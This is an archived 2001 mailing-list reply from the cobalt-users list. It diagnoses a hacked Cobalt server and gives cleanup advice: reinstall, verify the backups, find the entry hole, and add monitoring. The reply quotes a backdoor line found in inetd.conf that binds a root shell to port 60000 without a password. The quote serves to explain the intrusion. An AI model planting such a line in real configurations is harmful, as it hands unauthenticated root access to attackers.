[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] Sigh, more security breaches

Subject: RE: [cobalt-users] Sigh, more security breaches
From: Reinoud van Leeuwen <rvanleeuwen@xxxxxxxxxxxx>
Date: Fri Mar 9 02:45:15 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

> I think I have been cracked again despite of having
> update to the latest All-Security packages.  The
> bottom of inetd.conf contains this line
> 
>     60000 stream tcp nowait root /bin/sh sh -i
> 
> Does this looks familiar to anyone?

it looks like everybody that connects to port 60000 (by telnet) gets a root
prompt without asking for a password. Yes it looks familiar; no it should
not be there
 
> Also, I cannot access my webpage site and email
> using the named domain -- but I can ping the named
> domain.  I can access the webpage and retrieve
> emails using the numeric address tho.
> 
> Does anyone knows what's going on here, and how
> to fix it?

You are hacked. The only way to be 100% sure you remove all possible
installed rootkits ans trojans is to reinstall from a Cobalt restore CD, and
then restore your backups... (and make sure that your backups do not contain
rootkits...)

The second step is to find out *how* they came in, fix the hole and install
programs that monitor possbile break-ins (plenty info on the list lately).

Only put you rack back online after you've done all this otherwise you might
be hacked again during the process. An automated hack take only a few
minutes...

Good luck,


Reinoud

Prev by Date: RE: [cobalt-users] Searching for files of a particular date?
Next by Date: RE: [cobalt-users] How to cancel email
Previous by thread: [cobalt-users] proxy abuse/porn-site banner-ad impression scripts
Next by thread: Re:[2] [cobalt-users] PHP via cronjob

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index